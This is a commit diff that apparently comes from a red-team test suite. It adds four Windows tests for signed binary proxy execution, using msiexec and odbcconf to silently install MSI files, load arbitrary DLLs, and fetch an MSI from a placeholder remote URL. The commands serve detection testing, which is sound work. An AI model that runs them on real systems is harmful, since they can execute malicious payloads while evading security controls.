T1218 proxied binary execution tests (#628)

* Added proxied binary execution tests * Generate docs from job=validate_atomics_generate_docs branch=t1218_tests
2019-11-08 19:57:19 -06:00
parent a611d8926b
commit e2309b30af
5 changed files with 297 additions and 0 deletions
@@ -33,6 +33,14 @@ Several other binaries exist that may be used to perform similar behavior. (Cita

 - [Atomic Test #3 - Register-CimProvider - Execute evil dll](#atomic-test-3---register-cimprovider---execute-evil-dll)

+- [Atomic Test #4 - Msiexec.exe - Execute Local MSI file](#atomic-test-4---msiexecexe---execute-local-msi-file)
+
+- [Atomic Test #5 - Msiexec.exe - Execute Remote MSI file](#atomic-test-5---msiexecexe---execute-remote-msi-file)
+
+- [Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL](#atomic-test-6---msiexecexe---execute-arbitrary-dll)
+
+- [Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL](#atomic-test-7---odbcconfexe---execute-arbitrary-dll)
+

 <br/>

@@ -97,4 +105,88 @@ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}



+<br/>
+<br/>
+
+## Atomic Test #4 - Msiexec.exe - Execute Local MSI file
+Execute arbitrary MSI file. Commonly seen in application installation.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218.msi|
+
+#### Run it with `command_prompt`! 
+```
+msiexec.exe /q /i "#{msi_payload}"
+```
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Msiexec.exe - Execute Remote MSI file
+Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | String | http://site.com/file.msi|
+
+#### Run it with `command_prompt`! 
+```
+msiexec.exe /q /i "#{msi_payload}"
+```
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL
+Execute arbitrary DLL file stored locally. Commonly seen in application installation.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll|
+
+#### Run it with `command_prompt`! 
+```
+msiexec.exe /y "#{dll_payload}"
+```
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL
+Execute arbitrary DLL file stored locally.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll|
+
+#### Run it with `command_prompt`! 
+```
+odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+```
+
+
+
 <br/>
@@ -58,3 +58,72 @@ atomic_tests:
    name: command_prompt
    command: |
     C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} 
+
+- name: Msiexec.exe - Execute Local MSI file 
+  description: |
+    Execute arbitrary MSI file. Commonly seen in application installation.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    msi_payload:
+      description: MSI file to execute
+      type: Path
+      default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi
+  executor:
+    name: command_prompt
+    command: |
+     msiexec.exe /q /i "#{msi_payload}" 
+
+- name: Msiexec.exe - Execute Remote MSI file 
+  description: |
+    Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    msi_payload:
+      description: MSI file to execute
+      type: String
+      default: http://site.com/file.msi
+  executor:
+    name: command_prompt
+    command: |
+     msiexec.exe /q /i "#{msi_payload}" 
+
+- name: Msiexec.exe - Execute Arbitrary DLL 
+  description: |
+    Execute arbitrary DLL file stored locally. Commonly seen in application installation.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    dll_payload:
+      description: DLL to execute
+      type: Path
+      default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+  executor:
+    name: command_prompt
+    command: |
+     msiexec.exe /y "#{dll_payload}" 
+
+- name: Odbcconf.exe - Execute Arbitrary DLL 
+  description: |
+    Execute arbitrary DLL file stored locally.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    dll_payload:
+      description: DLL to execute
+      type: Path
+      default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+  executor:
+    name: command_prompt
+    command: |
+     odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+ 
@@ -342,6 +342,10 @@
  - Atomic Test #1: mavinject - Inject DLL into running process [windows]
  - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
  - Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+  - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+  - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+  - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+  - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
  - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
 - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -710,6 +714,10 @@
  - Atomic Test #1: mavinject - Inject DLL into running process [windows]
  - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
  - Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+  - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+  - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+  - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+  - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
  - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
 - [T1153 Source](./T1153/T1153.md)
@@ -10237,6 +10237,66 @@ defense-evasion:
        name: command_prompt
        command: "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload}
          \n"
+    - name: Msiexec.exe - Execute Local MSI file
+      description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_payload:
+          description: MSI file to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi
+      executor:
+        name: command_prompt
+        command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+    - name: Msiexec.exe - Execute Remote MSI file
+      description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
+        in application installation, commonly seen in malware execution.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_payload:
+          description: MSI file to execute
+          type: String
+          default: http://site.com/file.msi
+      executor:
+        name: command_prompt
+        command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+    - name: Msiexec.exe - Execute Arbitrary DLL
+      description: 'Execute arbitrary DLL file stored locally. Commonly seen in application
+        installation.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_payload:
+          description: DLL to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+      executor:
+        name: command_prompt
+        command: "msiexec.exe /y \"#{dll_payload}\" \n"
+    - name: Odbcconf.exe - Execute Arbitrary DLL
+      description: 'Execute arbitrary DLL file stored locally.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_payload:
+          description: DLL to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+      executor:
+        name: command_prompt
+        command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+
+'
  T1216:
    technique:
      x_mitre_data_sources:
@@ -20397,6 +20457,66 @@ execution:
        name: command_prompt
        command: "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload}
          \n"
+    - name: Msiexec.exe - Execute Local MSI file
+      description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_payload:
+          description: MSI file to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi
+      executor:
+        name: command_prompt
+        command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+    - name: Msiexec.exe - Execute Remote MSI file
+      description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
+        in application installation, commonly seen in malware execution.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_payload:
+          description: MSI file to execute
+          type: String
+          default: http://site.com/file.msi
+      executor:
+        name: command_prompt
+        command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+    - name: Msiexec.exe - Execute Arbitrary DLL
+      description: 'Execute arbitrary DLL file stored locally. Commonly seen in application
+        installation.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_payload:
+          description: DLL to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+      executor:
+        name: command_prompt
+        command: "msiexec.exe /y \"#{dll_payload}\" \n"
+    - name: Odbcconf.exe - Execute Arbitrary DLL
+      description: 'Execute arbitrary DLL file stored locally.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_payload:
+          description: DLL to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+      executor:
+        name: command_prompt
+        command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+
+'
  T1216:
    technique:
      x_mitre_data_sources:
@@ -132,6 +132,10 @@
  - Atomic Test #1: mavinject - Inject DLL into running process [windows]
  - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
  - Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+  - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+  - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+  - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+  - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
  - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
 - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -572,6 +576,10 @@
  - Atomic Test #1: mavinject - Inject DLL into running process [windows]
  - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
  - Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+  - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+  - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+  - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+  - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
  - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
 - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)